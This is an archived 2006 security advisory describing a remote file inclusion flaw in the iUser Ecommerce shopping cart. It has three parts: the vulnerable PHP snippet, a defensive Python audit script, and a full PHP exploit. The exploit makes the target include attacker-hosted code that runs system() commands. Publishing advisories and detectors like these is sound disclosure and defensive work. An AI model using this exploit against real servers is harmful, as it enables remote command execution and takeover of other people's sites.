Securityvulns SECURITYVULNS:DOC:11463
History: Feb 16, 2006 - 12:00 a.m.

[Full-disclosure] iUser Ecommerce - Remote Command Execution Vulnerability


=======================================================================================
XOR Crew :: Security Advisory 1/10/2006

iUser Ecommerce - Remote Command Execution Vulnerability

http://www.xorcrew.net/

:: Summary

  Vendor       :  Intensive Point
  Vendor Site  :  http://www.intensivepoint.com/
  Product(s)   :  iUser Ecommerce - shopping cart for digital products
  Version(s)   :  All
  Severity     :  Medium/High
  Impact       :  Remote Command Execution
  Release Date :  1/10/2006
  Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

The iUser digital products shopping cart system has a broad range of features, giving
you an incredible amount of flexibility, while remaining secure, easy to implement and
administer. There is simply no other comparable shopping cart solution specializing in
software downloads distribution available on the market at this price!

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution
in the common.php file. The bug is here on lines 28, 29, and 32:

// Load iuser configuration files
@require($include_path . "setup.php");
@require($include_path . "config.php");

// Load misc functions
require($include_path . "util.php");

The $include_path variable is not set prior to being used in the require() function.
The vendor has been contacted and the issue has been resolved.
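
A heuristic source audit for the pattern described above, added here as an example (it is not part of the original advisory or the vendor's code). It flags every include/require whose path uses a variable that the script itself has not assigned earlier in the file. ADVISORY_EXCERPT is the snippet quoted above; the function names and the PATCHED sample are assumptions made for illustration.

```python
import re

# include/require[_once] statement; group 1 is the path expression up to ";".
INCLUDE_RE = re.compile(r'(?<![$\w>])(?:include|require)(?:_once)?\b\s*\(?([^;]*);', re.I)
ASSIGN_RE = re.compile(r'\$([A-Za-z_]\w*)\s*=(?!=)([^;]*)')   # $var = <rhs>
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
REQUEST_RE = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')  # request-supplied data

# Snippet quoted in the advisory (line numbers below are relative to this excerpt).
ADVISORY_EXCERPT = '''// Load iuser configuration files
@require($include_path . "setup.php");
@require($include_path . "config.php");

// Load misc functions
require($include_path . "util.php");
'''
# Constructed sample: one possible fix (an assumption, not the vendor's patch).
PATCHED = '$include_path = dirname(__FILE__) . "/";\n' + ADVISORY_EXCERPT

def _track(assigned, code):
    """Return `assigned` updated with the assignments found in `code`."""
    out = set(assigned)
    for m in ASSIGN_RE.finditer(code):
        # A value taken from the request does not count as "set by the script".
        if REQUEST_RE.search(m.group(2)):
            out.discard(m.group(1))
        else:
            out.add(m.group(1))
    return out

def audit_includes(php_source):
    """List (line, variable, statement) for every include/require whose path uses a
    variable with no earlier script-side assignment in the same file.
    Heuristic only: linear scan, no control flow, functions or other files."""
    findings, assigned = [], set()
    for no, line in enumerate(php_source.splitlines(), 1):
        code = line.strip()
        if code.startswith(('//', '#', '/*', '*')):
            continue  # whole-line comments
        m = INCLUDE_RE.search(code)
        if m:
            known = _track(assigned, code[:m.start()])
            findings += [(no, '$' + v, code) for v in VAR_RE.findall(m.group(1)) if v not in known]
        assigned = _track(assigned, code)
    return findings

if __name__ == "__main__":
    for no, var, stmt in audit_includes(ADVISORY_EXCERPT):
        print(f"line {no}: {var} used in include path before assignment: {stmt}")
    print("patched sample findings:", audit_includes(PATCHED))
```

A finding means the variable needs a script-side value before the include; an empty list from this scan does not prove the file safe, since values set in other files or inside functions are not followed.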

=======================================================================================

Exploit code:

-----BEGIN-----

<?php

/*
iUser Remote File Inclusion Exploit c0ded by ReZEN

Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN
*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];

$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))

{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"".$cmd."\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");

if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}

echo $form;

while (!feof ($file)) {
$line = fgets ($file, 1024);
echo $line."<br>";

}

}
?>

------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

=======================================================================================